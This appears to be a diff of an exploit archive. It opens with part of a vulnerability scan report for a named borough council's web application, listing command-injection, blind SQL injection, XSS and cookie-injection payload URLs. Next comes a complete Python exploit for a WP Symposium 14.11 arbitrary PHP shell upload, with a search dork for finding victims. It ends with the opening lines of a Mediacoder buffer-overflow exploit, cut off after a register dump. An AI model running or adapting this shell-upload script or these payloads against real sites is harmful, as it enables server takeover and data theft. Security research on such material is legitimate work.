Solution:
|
||||
Restrict access to the vulnerable application. Contact the
|
||||
vendor for a patch or upgrade.
|
||||
|
||||
Information:
|
||||
Using the GET HTTP method, Nessus found that:
|
||||
|
||||
+ The following resources may be vulnerable to arbitrary command
|
||||
execution (time based) :
|
||||
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :
|
||||
|
||||
/pages/themes.php?lastlevelchange=%20;%20x%20%7C%7C%20sleep%203%20%26
|
||||
/pages/themes.php?lastlevelchange=%7C%7C%20sleep%203%20%26
|
||||
/pages/themes.php?lastlevelchange=%26%20ping%20n%203%20127.0.0.1%20%26
|
||||
/pages/themes.php?lastlevelchange=x%20%7C%7C%20ping%20n%203%20127.0.0.1%20%26
|
||||
/pages/themes.php?lastlevelchange=%7C%7C%20ping%20n%203%20127.0.0.1%20%26
|
||||
/pages/themes.php?lastlevelchange=%7C%20ping%20n%203%20127.0.0.1%20%7C
|
||||
|
||||
References:
|
||||
CWE: 20
|
||||
CWE: 713
|
||||
CWE: 722
|
||||
CWE: 727
|
||||
CWE: 74
|
||||
CWE: 77
|
||||
CWE: 78
|
||||
|
||||
–-----------------------------------------------------------------------------------------------------
|
||||
Vulnerability: 43160
|
||||
Name: CGI Generic SQL Injection (blind, time based)
|
||||
Type: CGI abuses
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud Vulnerability Scan
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname:
|
||||
Last Seen: 11 Nov 2014
|
||||
Service: tcp/www:443
|
||||
Severity: 4
|
||||
Risk: 40
|
||||
CVSS Base Score: 7.5
|
||||
|
||||
Description
|
||||
By sending specially crafted parameters to one or more CGI scripts
|
||||
hosted on the remote web server, Nessus was able to get a slower
|
||||
response, which suggests that it may have been able to modify the
|
||||
behavior of the application and directly access the underlying
|
||||
database.
|
||||
An attacker may be able to exploit this issue to bypass
|
||||
authentication, read confidential data, modify the remote database, or
|
||||
even take control of the remote operating system.
|
||||
Note that this script is experimental and may be prone to false positives.
|
||||
|
||||
Solution:
|
||||
Modify the affected CGI scripts so that they properly escape arguments.
|
||||
|
||||
Information:
|
||||
Using the GET HTTP method, Nessus found that :
|
||||
+ The following resources may be vulnerable to blind SQL injection
|
||||
(time based) :
|
||||
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :
|
||||
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='
|
||||
/pages/themes.php?lastlevelchange='%20AND%200%20IN%20(SELECT%20SLEEP(3))%20%20
|
||||
/pages/themes.php?lastlevelchange=';WAITFOR%20DELAY%20'00:00:3';
|
||||
/pages/themes.php?lastlevelchange=');WAITFOR%20DELAY%20'00:00:3';
|
||||
/pages/themes.php?lastlevelchange='));WAITFOR%20DELAY%20'00:00:3';
|
||||
/pages/themes.php?lastlevelchange=';SELECT%20pg_sleep(3);
|
||||
/pages/themes.php?lastlevelchange=');SELECT%20pg_sleep(3);
|
||||
/pages/themes.php?lastlevelchange='));SELECT%20pg_sleep(3);
|
||||
|
||||
Clicking directly on these URLs should exhibit the issue :
|
||||
(you will probably need to read the HTML source)
|
||||
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='
|
||||
|
||||
References
|
||||
CWE: 20
|
||||
CWE: 713
|
||||
CWE: 722
|
||||
CWE: 727
|
||||
CWE: 751
|
||||
CWE: 77
|
||||
CWE: 801
|
||||
CWE: 810
|
||||
CWE: 89
|
||||
|
||||
–---------------------------------------------------------------------------------------------------------------
|
||||
|
||||
Vulnerability: 55903
|
||||
Name: CGI Generic XSS (extended patterns)
|
||||
Type: CGI abuses : XSS
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud Vulnerability Scan
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname
|
||||
Last Seen: 11 Nov 2014
|
||||
Service: tcp/www:443
|
||||
Severity: 3
|
||||
Risk: 30
|
||||
CVSS Base Score: 4.3
|
||||
|
||||
Description
|
||||
The remote web server hosts one or more CGI scripts that fail to
|
||||
adequately sanitize request strings with malicious JavaScript. By
|
||||
leveraging this issue, an attacker may be able to cause arbitrary HTML
|
||||
and script code to be executed in a user's browser within the security
|
||||
context of the affected site. These XSS vulnerabilities are likely to
|
||||
be 'nonpersistent' or 'reflected'.
|
||||
|
||||
Solution
|
||||
Restrict access to the vulnerable application. Contact the vendor for
|
||||
a patch or upgrade.
|
||||
|
||||
Information
|
||||
Using the GET HTTP method, Nessus found that :
|
||||
+ The following resources may be vulnerable to crosssite scripting+
|
||||
The 'sort' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=504%20onerror="alert(504);
|
||||
output
|
||||
(extended patterns) :
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
|
||||
a>
|
||||
|
||||
/pages/preview.php?sort=&sort=504%20onerror="alert(504);
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
|
||||
a>
|
||||
|
||||
+ The 'order_by' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?order_by=504%20onerror="alert(504);
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=504 o
|
||||
nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
|
||||
ew</a>
|
||||
|
||||
/pages/preview.php?order_by=&order_by=504%20onerror="alert(504);
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=504 o
|
||||
nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
|
||||
ew</a>
|
||||
|
||||
+ The 'sort' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=504%20onerror="alert(504);&search=&order_by=&fro
|
||||
m=
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
|
||||
a>
|
||||
|
||||
/pages/preview.php?sort=&sort=504%20onerror="alert(504);&search=&order_b
|
||||
y=&from=
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
|
||||
a>
|
||||
|
||||
+ The 'order_by' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=&search=&order_by=504%20onerror="alert(504);&fro
|
||||
m=
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=504 o
|
||||
nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
|
||||
Tonbridge & Malling Borough Council
|
||||
Vulnerabilities Report | 5
|
||||
a>
|
||||
|
||||
/pages/preview.php?sort=&search=&order_by=&order_by=504%20onerror="alert
|
||||
(504);&from=
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=504 o
|
||||
nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
|
||||
a>
|
||||
|
||||
Clicking directly on these URLs should exhibit the issue :
|
||||
(you will probably need to read the HTML source)
|
||||
/pages/preview.php?sort=504%20onerror="alert(504);
|
||||
/pages/preview.php?order_by=504%20onerror="alert(504);
|
||||
References
|
||||
CWE: 116
|
||||
CWE: 20
|
||||
CWE: 442
|
||||
CWE: 692
|
||||
CWE: 712
|
||||
CWE: 722
|
||||
CWE: 725
|
||||
CWE: 74
|
||||
CWE: 751
|
||||
CWE: 79
|
||||
CWE: 80
|
||||
CWE: 801
|
||||
CWE: 81
|
||||
CWE: 811
|
||||
CWE: 83
|
||||
CWE: 86
|
||||
|
||||
–----------------------------------------------------------------------------------------------------
|
||||
|
||||
Vulnerability: 49067
|
||||
Name: CGI Generic HTML Injections (quick test)
|
||||
Type: CGI abuses : XSS
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud Vulnerability Scan
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname
|
||||
Last Seen: 11 Nov 2014
|
||||
Service: tcp/www:443
|
||||
Severity: 3
|
||||
Risk: 30
|
||||
CVSS Base Score: 5.0
|
||||
|
||||
Description
|
||||
The remote web server hosts CGI scripts that fail to adequately sanitize
|
||||
request strings with malicious JavaScript. By leveraging this issue,
|
||||
an attacker may be able to cause arbitrary HTML to be executed
|
||||
inuser's browser within the security context of the affected site.
|
||||
The remote web server may be vulnerable to IFRAME injections or
|
||||
crosssite scripting attacks :
|
||||
IFRAME injections allow 'virtual defacement' that
|
||||
might scare or anger gullible users. Such injections
|
||||
are sometimes implemented for 'phishing' attacks.
|
||||
XSS are extensively tested by four other scripts.
|
||||
Some applications (e.g. web forums) authorize a subset
|
||||
of HTML without any ill effect. In this case, ignore
|
||||
this warning.
|
||||
|
||||
Solution
|
||||
Either restrict access to the vulnerable application or contact the
|
||||
vendor for an update.
|
||||
|
||||
Information
|
||||
Using the GET HTTP method, Nessus found that :
|
||||
+ The following resources may be vulnerable to HTML injection :
|
||||
+ The 'sort' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=<"jfunqd%20>
|
||||
output
|
||||
a
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=<"jfunqd >&archive=&k=">< Back to resource view</a>
|
||||
|
||||
+ The 'order_by' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?order_by=<"jfunqd%20>
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=<"jfu
|
||||
nqd >&sort=DESC&archive=&k=">< Back to resource view</a>
|
||||
|
||||
+ The 'sort' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=<"jfunqd%20>&search=&order_by=&from=
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=<"jfunqd >&archive=&k=">< Back to resource view</a>
|
||||
|
||||
+ The 'order_by' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=&search=&order_by=<"jfunqd%20>&from=
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=<"jfu
|
||||
nqd >&sort=&archive=&k=">< Back to resource view</a>
|
||||
|
||||
Clicking directly on these URLs should exhibit the issue :
|
||||
(you will probably need to read the HTML source)
|
||||
/pages/preview.php?sort=<"jfunqd%20>
|
||||
/pages/preview.php?order_by=<"jfunqd%20>
|
||||
|
||||
References
|
||||
CWE: 80
|
||||
CWE: 86
|
||||
|
||||
–---------------------------------------------------------------------------------------------------
|
||||
Vulnerability: SC1628
|
||||
Name: SSL cookie without secure flag set
|
||||
Type: Web Servers
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname:
|
||||
Last Seen: 12 Nov 2014
|
||||
Service: tcp/https:443
|
||||
Severity: 3
|
||||
Risk: 30
|
||||
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
|
||||
|
||||
Resolution Effort: 1
|
||||
Description
|
||||
If the secure flag is not set, then the cookie will be transmitted in
|
||||
cleartext if the user visits any non SSL
|
||||
(HTTP) URLs within the cookie's scope.
|
||||
Solution
|
||||
The secure flag should be set on all cookies that are used for
|
||||
transmitting sensitive data when accessing
|
||||
content over HTTPS.
|
||||
If cookies are used to transmit session tokens, then areas of the
|
||||
application that are accessed over HTTPS
|
||||
should employ their own session handling mechanism, and the session
|
||||
tokens used should never be
|
||||
transmitted over unencrypted communications.
|
||||
Information
|
||||
|
||||
URI: /pages/help.php
|
||||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:11 GMT
|
||||
URI: /pages/search.php
|
||||
Other Info: display=thumbs; httponly
|
||||
URI: /pages/themes.php
|
||||
Other Info: saved_themes_order_by=name; httponly
|
||||
URI: /pages/user_password.php
|
||||
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:53:08 GMT; httponly
|
||||
URI: /pages/user_password.php
|
||||
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:54:30 GMT; httponly
|
||||
URI: /pages/user_request.php
|
||||
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:53:07 GMT; httponly
|
||||
URI: /pages/user_request.php
|
||||
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:54:25 GMT; httponly
|
||||
|
||||
–-------------------------------------------------------------------------------
|
||||
|
||||
Vulnerability: 44136
|
||||
Name: CGI Generic Cookie Injection Scripting
|
||||
Type: CGI abuses
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud Vulnerability Scan
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname:
|
||||
Last Seen: 11 Nov 2014
|
||||
Service: tcp/www:443
|
||||
Severity: 3
|
||||
Risk: 30
|
||||
CVSS Base Score: 5.0
|
||||
|
||||
Description
|
||||
The remote web server hosts at least one CGI script that fails to
|
||||
adequately sanitize request strings with malicious JavaScript.
|
||||
By leveraging this issue, an attacker may be able to inject arbitrary
|
||||
cookies. Depending on the structure of the web application, it may be
|
||||
possible to launch a 'session fixation' attack using this mechanism.
|
||||
Please note that :
|
||||
Nessus did not check if the session fixation attack is
|
||||
feasible.
|
||||
This is not the only vector of session fixation.
|
||||
|
||||
Solution
|
||||
Restrict access to the vulnerable application. Contact the vendor
|
||||
for a patch or upgrade.
|
||||
|
||||
Information
|
||||
Using the GET HTTP method, Nessus found that :
|
||||
+ The following resources may be vulnerable to cookie manipulation :
|
||||
+ The 'sort' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=<script>document.cookie="testshay=5812;"</script
|
||||
>
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbs
|
||||
p;Back to resource view</a>
|
||||
|
||||
/pages/preview.php?sort=&sort=<script>document.cookie="testshay=5812;"</
|
||||
script>
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbs
|
||||
p;Back to resource view</a>
|
||||
|
||||
References
|
||||
CWE: 472
|
||||
CWE: 642
|
||||
CWE: 715
|
||||
CWE: 722
|
||||
|
||||
–--------------------------------------------------------------------------------------------
|
||||
|
||||
Vulnerability: 39466
|
||||
Name: CGI Generic XSS (quick test)
|
||||
Type: CGI abuses : XSS
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud Vulnerability Scan
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname:
|
||||
Last Seen: 11 Nov 2014
|
||||
Service: tcp/www:443
|
||||
Severity: 3
|
||||
Risk: 30
|
||||
CVSS Base Score: 5.0
|
||||
|
||||
Description
|
||||
The remote web server hosts CGI scripts that fail to adequately sanitize
|
||||
request strings with malicious JavaScript. By leveraging this issue,
|
||||
an attacker may be able to cause arbitrary HTML and script code
|
||||
to be executed in a user's browser within the security context of the
|
||||
affected site.
|
||||
These XSS are likely to be 'non persistent' or 'reflected'.
|
||||
Solution
|
||||
Restrict access to the vulnerable application. Contact the vendor
|
||||
for a patch or upgrade.
|
||||
|
||||
Information
|
||||
Using the GET HTTP method, Nessus found that :
|
||||
+ The following resources may be vulnerable to crosssite scripting
|
||||
(quick+ The 'order_by' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?order_by=<IMG%20SRC="javascript:alert(104);">
|
||||
output
|
||||
test) :
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=<IMG
|
||||
SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
|
||||
esource view</a>
|
||||
|
||||
/pages/preview.php?order_by=&order_by=<IMG%20SRC="javascript:alert(104);
|
||||
">
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=<IMG
|
||||
SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
|
||||
esource view</a>
|
||||
|
||||
+ The 'sort' parameter of the /pages/preview.php CGI :
|
||||
/pages/preview.php?sort=<IMG%20SRC="javascript:alert(104);">
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
|
||||
rce view</a>
|
||||
|
||||
/pages/preview.php?sort=&sort=<IMG%20SRC="javascript:alert(104);">
|
||||
output
|
||||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||||
=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
|
||||
rce view</a>
|
||||
|
||||
|
||||
References
|
||||
CWE: 116
|
||||
CWE: 20
|
||||
CWE: 442
|
||||
CWE: 692
|
||||
CWE: 712
|
||||
CWE: 722
|
||||
CWE: 725
|
||||
CWE: 74
|
||||
CWE: 751
|
||||
CWE: 79
|
||||
CWE: 80
|
||||
CWE: 801
|
||||
CWE: 81
|
||||
CWE: 811
|
||||
CWE: 83
|
||||
CWE: 86
|
||||
|
||||
–--------------------------------------------------------------------------------------------------------------
|
||||
|
||||
Also issues to be aware of:
|
||||
|
||||
Vulnerability: SC1629
|
||||
Name: Cookie without HttpOnly flag set
|
||||
Type: Web Servers
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname:
|
||||
Last Seen: 12 Nov 2014
|
||||
Service: tcp/https:443
|
||||
Severity: 3
|
||||
Risk: 30
|
||||
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
|
||||
Resolution Effort: 1
|
||||
Description
|
||||
When the HttpOnly attribute is set on a cookie, then the cookies
|
||||
value cannot be read or set by clientside
|
||||
JavaScript.
|
||||
HttpOnly prevent certain clientside attacks, such as Cross Site
|
||||
Scripting (XSS), from capturing the cookies
|
||||
value via an injected script. When HttpOnly is set, script access to
|
||||
document.cookie results in a blank string
|
||||
being returned.
|
||||
Solution
|
||||
HttpOnly can safely be set for all Cookie values, unless the
|
||||
application has a specific need for Script access
|
||||
to cookie contents (which is highly unusual).
|
||||
Please note also that HttpOnly does not mitigate against all dangers
|
||||
of Cross Site Scripting any XSS
|
||||
vulnerabilities identified must still be fixed.
|
||||
Information
|
||||
URI: /pages/help.php
|
||||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:11 GMT
|
||||
|
||||
–-------------------------------------------------------------------------------
|
||||
|
||||
Vulnerability: SC1629
|
||||
Name: Cookie without HttpOnly flag set
|
||||
Type: Web Servers
|
||||
Asset Group: Multiple
|
||||
Source: SureCloud
|
||||
IP Address:
|
||||
Status: Open
|
||||
Hostname:
|
||||
Last Seen: 12 Nov 2014
|
||||
Service: tcp/http:80
|
||||
Severity: 3
|
||||
Risk: 30
|
||||
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
|
||||
Resolution Effort: 1
|
||||
|
||||
Description
|
||||
When the HttpOnly attribute is set on a cookie, then the cookies
|
||||
value cannot be read or set by clientside JavaScript.
|
||||
HttpOnly prevent certain clientside attacks, such as Cross Site
|
||||
Scripting (XSS), from capturing the cookies value via an injected
|
||||
script. When HttpOnly is set, script access to document.cookie results
|
||||
in a blank string being returned.
|
||||
|
||||
Solution
|
||||
HttpOnly can safely be set for all Cookie values, unless the
|
||||
application has a specific need for Script access
|
||||
to cookie contents (which is highly unusual).
|
||||
Please note also that HttpOnly does not mitigate against all dangers
|
||||
of Cross Site Scripting any XSS vulnerabilities identified must
|
||||
still be fixed.
|
||||
|
||||
Information
|
||||
URI: /pages/collection_share.php
|
||||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:42 GMT
|
||||
URI: /pages/contactsheet_settings.php
|
||||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:38 GMT
|
||||
URI: /pages/help.php
|
||||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:05 GMT
|
||||
URI: /pages/preview.php
|
||||
Other Info: thumbs=hide; expires=Tue, 08Aug2017 01:57:55 GMT
|
||||
URI: /pages/resource_email.php
|
||||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:57:42 GMT
|
||||
URI: /pages/view.php
|
||||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:57:45 GMT
|
210
platforms/php/webapps/35543.txt
Executable file
210
platforms/php/webapps/35543.txt
Executable file
|
@ -0,0 +1,210 @@
|
|||
#!/usr/bin/python
|
||||
#
|
||||
# Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
|
||||
#
|
||||
#
|
||||
# Vulnerability discovered by Claudio Viviani
|
||||
#
|
||||
# Exploit written by Claudio Viviani
|
||||
#
|
||||
#
|
||||
# 2014-11-27: Discovered vulnerability
|
||||
# 2014-12-01: Vendor Notification (Twitter)
|
||||
# 2014-12-02: Vendor Notification (Web Site)
|
||||
# 2014-12-04: Vendor Notification (E-mail)
|
||||
# 2014-12-11: No Response/Feedback
|
||||
# 2014-12-11: Published
|
||||
#
|
||||
# Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
|
||||
#
|
||||
# --------------------------------------------------------------------
|
||||
#
|
||||
# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected:
|
||||
#
|
||||
# if ($_FILES["file"]["error"] > 0) {
|
||||
# echo "Error: " . $_FILES["file"]["error"] . "<br>";
|
||||
# } else {
|
||||
# $allowedExts = ','.get_option(WPS_OPTIONS_PREFIX.'_image_ext').','.get_option(WPS_OPTIONS_PREFIX.'_doc_ext').','.get_option(WPS_OPTIONS_PREFIX.'_video_ext');
|
||||
# //echo "Upload: " . $_FILES["file"]["name"] . "<br>";
|
||||
# $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION);
|
||||
# //echo "Extension: " . $ext . "<br />";
|
||||
# if (strpos($allowedExts, $ext)) {
|
||||
# $extAllowed = true;
|
||||
# } else {
|
||||
# $extAllowed = false;
|
||||
# }
|
||||
# //echo "Type: " . $_FILES["file"]["type"] . "<br>";
|
||||
# //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
|
||||
# //echo "Stored in: " . $_FILES["file"]["tmp_name"];
|
||||
#
|
||||
# if (!$extAllowed) {
|
||||
# echo __('Sorry, file type not allowed.', WPS_TEXT_DOMAIN);
|
||||
# } else {
|
||||
# // Copy file to tmp location
|
||||
# ...
|
||||
# ...
|
||||
# ...
|
||||
#
|
||||
# BUTTTTT "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension
|
||||
#
|
||||
# The same vulnerable files are locate in "/wp-symposium/mobile-files/server/php/"
|
||||
#
|
||||
# ---------------------------------------------------------------------
|
||||
#
|
||||
# Dork google: index of "wp-symposium"
|
||||
#
|
||||
#
|
||||
# Tested on BackBox 3.x with python 2.6
|
||||
#
|
||||
# Http connection
|
||||
import urllib, urllib2, socket
|
||||
#
|
||||
import sys
|
||||
# String manipulator
|
||||
import string, random
|
||||
# Args management
|
||||
import optparse
|
||||
# File management
|
||||
import os, os.path, mimetypes
|
||||
|
||||
# Check url
|
||||
def checkurl(url):
|
||||
if url[:8] != "https://" and url[:7] != "http://":
|
||||
print('[X] You must insert http:// or https:// procotol')
|
||||
sys.exit(1)
|
||||
else:
|
||||
return url
|
||||
|
||||
# Check if file exists and has readable
|
||||
def checkfile(file):
|
||||
if not os.path.isfile(file) and not os.access(file, os.R_OK):
|
||||
print '[X] '+file+' file is missing or not readable'
|
||||
sys.exit(1)
|
||||
else:
|
||||
return file
|
||||
# Get file's mimetype
|
||||
def get_content_type(filename):
|
||||
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
|
||||
|
||||
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
|
||||
return ''.join(random.choice(chars) for _ in range(size))
|
||||
|
||||
# Create multipart header
|
||||
def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
|
||||
|
||||
getfields = dict()
|
||||
getfields['uploader_uid'] = '1'
|
||||
getfields['uploader_dir'] = './'+randDirName
|
||||
getfields['uploader_url'] = url_symposium_upload
|
||||
|
||||
payloadcontent = open(payloadname).read()
|
||||
|
||||
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
|
||||
CRLF = '\r\n'
|
||||
|
||||
L = []
|
||||
for (key, value) in getfields.items():
|
||||
L.append('--' + LIMIT)
|
||||
L.append('Content-Disposition: form-data; name="%s"' % key)
|
||||
L.append('')
|
||||
L.append(value)
|
||||
|
||||
L.append('--' + LIMIT)
|
||||
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
|
||||
L.append('Content-Type: %s' % get_content_type(payloadname))
|
||||
L.append('')
|
||||
L.append(payloadcontent)
|
||||
L.append('--' + LIMIT + '--')
|
||||
L.append('')
|
||||
body = CRLF.join(L)
|
||||
return body
|
||||
|
||||
banner = """
|
||||
___ ___ __
|
||||
| Y .-----.----.--| .-----.----.-----.-----.-----.
|
||||
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|
||||
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|
||||
|: | |__|
|
||||
|::.|:. |
|
||||
`--- ---'
|
||||
___ ___ _______ _______ __
|
||||
| Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------.
|
||||
|. | |. 1 |______| 1___| | | | _ | _ |__ --| | | | |
|
||||
|. / \ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__|
|
||||
|: |: | |: 1 |_____| |__|
|
||||
|::.|:. |::.| |::.. . |
|
||||
`--- ---`---' `-------'
|
||||
Wp-Symposium
|
||||
Sh311 Upl04d Vuln3r4b1l1ty
|
||||
v14.11
|
||||
|
||||
Written by:
|
||||
|
||||
Claudio Viviani
|
||||
|
||||
http://www.homelab.it
|
||||
|
||||
info@homelab.it
|
||||
homelabit@protonmail.ch
|
||||
|
||||
https://www.facebook.com/homelabit
|
||||
https://twitter.com/homelabit
|
||||
https://plus.google.com/+HomelabIt1/
|
||||
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
|
||||
"""
|
||||
|
||||
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
|
||||
commandList.add_option('-t', '--target', action="store",
|
||||
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
|
||||
)
|
||||
commandList.add_option('-f', '--file', action="store",
|
||||
help="Insert file name, ex: shell.php",
|
||||
)
|
||||
commandList.add_option('--timeout', action="store", default=10, type="int",
|
||||
help="[Timeout Value] - Default 10",
|
||||
)
|
||||
|
||||
options, remainder = commandList.parse_args()
|
||||
|
||||
# Check args
|
||||
if not options.target or not options.file:
|
||||
print(banner)
|
||||
commandList.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
payloadname = checkfile(options.file)
|
||||
host = checkurl(options.target)
|
||||
timeout = options.timeout
|
||||
|
||||
print(banner)
|
||||
|
||||
socket.setdefaulttimeout(timeout)
|
||||
|
||||
url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
|
||||
|
||||
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
|
||||
|
||||
randDirName = id_generator()
|
||||
randShellName = id_generator()
|
||||
|
||||
bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
|
||||
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
|
||||
'content-type': content_type,
|
||||
'content-length': str(len(bodyupload)) }
|
||||
|
||||
try:
|
||||
req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
|
||||
response = urllib2.urlopen(req)
|
||||
read = response.read()
|
||||
|
||||
if "error" in read or read == "0" or read == "":
|
||||
print("[X] Upload Failed :(")
|
||||
else:
|
||||
print("[!] Shell Uploaded")
|
||||
print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")
|
||||
|
||||
except urllib2.HTTPError as e:
|
||||
print("[X] "+str(e))
|
||||
except urllib2.URLError as e:
|
||||
print("[X] Connection Error: "+str(e))
|
24
platforms/windows/local/35530.py
Executable file
24
platforms/windows/local/35530.py
Executable file
|
@ -0,0 +1,24 @@
|
|||
# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u)
|
||||
# Date: 11/29/2010
|
||||
# Author: Hadji Samir s-dz@hotmail.fr
|
||||
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
|
||||
# Version: 0.8.33 build 5680
|
||||
|
||||
EAX 0012E508
|
||||
